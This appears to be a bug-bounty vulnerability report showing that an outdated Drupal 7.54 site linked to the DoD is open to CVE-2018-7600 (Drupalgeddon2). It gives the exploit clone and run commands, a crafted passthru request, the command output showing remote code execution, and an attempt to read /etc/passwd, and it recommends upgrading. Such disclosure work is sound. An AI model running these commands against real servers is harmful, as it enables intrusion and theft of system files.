9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.976 High
EPSS
Percentile
100.0%
Due to an outdated Drupal version, remote code execution is possible on www.█████
via CVE-2018-7600.
Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
Vulnerable Host:
www.███
Visiting https://www.███/███
we can see that we have a Drupal with version 7.54, which was updated the last time in 2017-02-01.
There are several critical and highly critical vulnerabilities known for this version (see https://api.drupal.org/api/drupal/████████/7.x
and https://www.drupal.org/security
). Among them is SA-CORE-2018-002
(CVE-2018-7600), which I will demonstrate here.
Note: I am reporting this here, since the page https://www.███████
seems to belong to the █████████, which belongs to the DOD. The footer further states: ██████. [...]
Download the git repository with the exploit: git clone https://github.com/dreadlocked/Drupalgeddon2.git && cd Drupalgeddon2
gem install nokogiri
Run the exploit with ruby ruby drupalgeddon2-customizable-beta.rb -u https://www.████████/ -v 7 -c id --form user/login
Parameters explanation:
-u, --url URL Service URL
-v, --version VERSION Target Drupal version {7,8}
-c, --command COMMAND Command to execute
--form Form to attack, by default '/user/password' in Drupal 7
The above command outputs:
root@5b08dc005375:/Drupalgeddon2# ruby drupalgeddon2-customizable-beta.rb -u https://www.████/ -v 7 -c id --form user/login
drupalgeddon2-customizable-beta.rb:184: warning: URI.escape is obsolete
[i] Requesting: www.███████//user/password/?name[%23post_render][]=passthru&name[%23markup]=id&name[%23type]=markup
[i] POST: form_id=user_pass&_triggering_element_name=name
[i] 200
[*] Obtained build id!: ████████
drupalgeddon2-customizable-beta.rb:220: warning: URI.escape is obsolete
drupalgeddon2-customizable-beta.rb:221: warning: URI.escape is obsolete
[i] Requesting: www.█████/file/ajax/name/%23value/██████
[i] POST: form_build_id=█████
[i] Response code: 200
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
root@5b08dc005375:/Drupalgeddon2#
As we can see, we successfully executed the id
command, which responded with uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
I am also providing the output of /etc/passwd
which I obtained with command
ruby drupalgeddon2-customizable-beta.rb -u https://www.██████/ -v 7 -c "cat /etc/passwd" --form user/login
Output:
████
██████
███████
████████
█████████
█████████
██████████
███
████
█████████
██████████
████
██████████
████████ █████
█████████
██████████
████████
██████████
██████
████
█████████
███████
███████
████
██████████
███
█████
█████
██████
Upgrade to the most recent version of Drupal 7 core.
Critical - Remote Code Execution
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.976 High
EPSS
Percentile
100.0%